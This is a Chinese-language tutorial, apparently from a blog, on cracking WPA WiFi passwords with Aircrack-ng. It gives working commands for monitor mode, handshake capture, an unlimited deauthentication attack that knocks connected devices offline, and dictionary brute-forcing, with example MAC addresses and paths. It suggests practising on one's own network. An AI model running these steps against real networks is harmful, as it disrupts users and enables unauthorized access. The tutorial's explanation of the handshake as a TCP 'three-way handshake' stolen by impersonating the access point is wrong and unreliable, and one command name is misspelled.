Aircrack-ng介绍
官网:https://www.aircrack-ng.org/
官方指南:https://www.aircrack-ng.org/doku.php
gitlab: https://github.com/aircrack-ng/aircrack-ng
Aircrack- ng是一套完整的评估 WiFi 网络安全的工具。 它专注于 WiFi 安全的不同领域: 监控:数据包捕获和数据导出到文本文件以供第三方工具进一步处理 攻击:通过数据包注入重放攻击、解除身份验证、虚假接入点等 测试:检查 WiFi 卡和驱动程序功能(捕获和注入) 破解:WEP 和 WPA PSK(WPA 1 和 2) 所有工具都是命令行,允许编写大量脚本。许多 GUI 都利用了此功能。它主要适用于 Linux,但也适用于 Windows、macOS、FreeBSD、OpenBSD、NetBSD,以及 Solaris 甚至 eComStation 2。
wifi破解配置准备
1.自建wifi进行测试
可用自家的WiFi或者使用手机热点
2.外置网卡设备
购买网卡 免驱 支持linux和window 价格在30元左右
3.信号稳定
不稳定的wifi可能在破解过程中中断
wifi 破解流程
1.查看网卡设备
命令:ifconfig | iwconfig
2.查看是否支持监听模式
命令:airmon-ng
3. 开启网卡监听模式
airmon-ng start wlan0
4.扫描wifi
airodump-ng wlan0mon
说明
BSSID为wifi的MAC地址
PWR为信号强弱程度,数值越小信号越强
#DATA为数据量,越大使用的人就越多
CH为信道频率(频道)
ESSID为wifi的名称,中文可能会有乱码
5.抓包
airodump-ng –bssid BSSID -c 信道频率 -w 抓包存储的路径 网卡名 (例如wlan0mon)
示例:airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home wlan0mon
6.如果抓取不到数据,攻击已连接设备使其断线
打开新终端执行命令:
airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(例如wlan0mon)
例如:aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon
0 WiFi设备无限次数,-0 8则攻击8次
攻击原理是:先让已连接设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码
数据包里面的密码是哈希加密的,哈希加密只能正向
出现WPA handshake时,表示抓包成功
7.爆破密码
aircrack-ng -w 字典文件路径 握手包路径
aircrack-ng -w /root/wordlists/pwd.txt /home/wifi-0.1.cap
上次更新时间 20 3 月, 2023 at 09:42 上午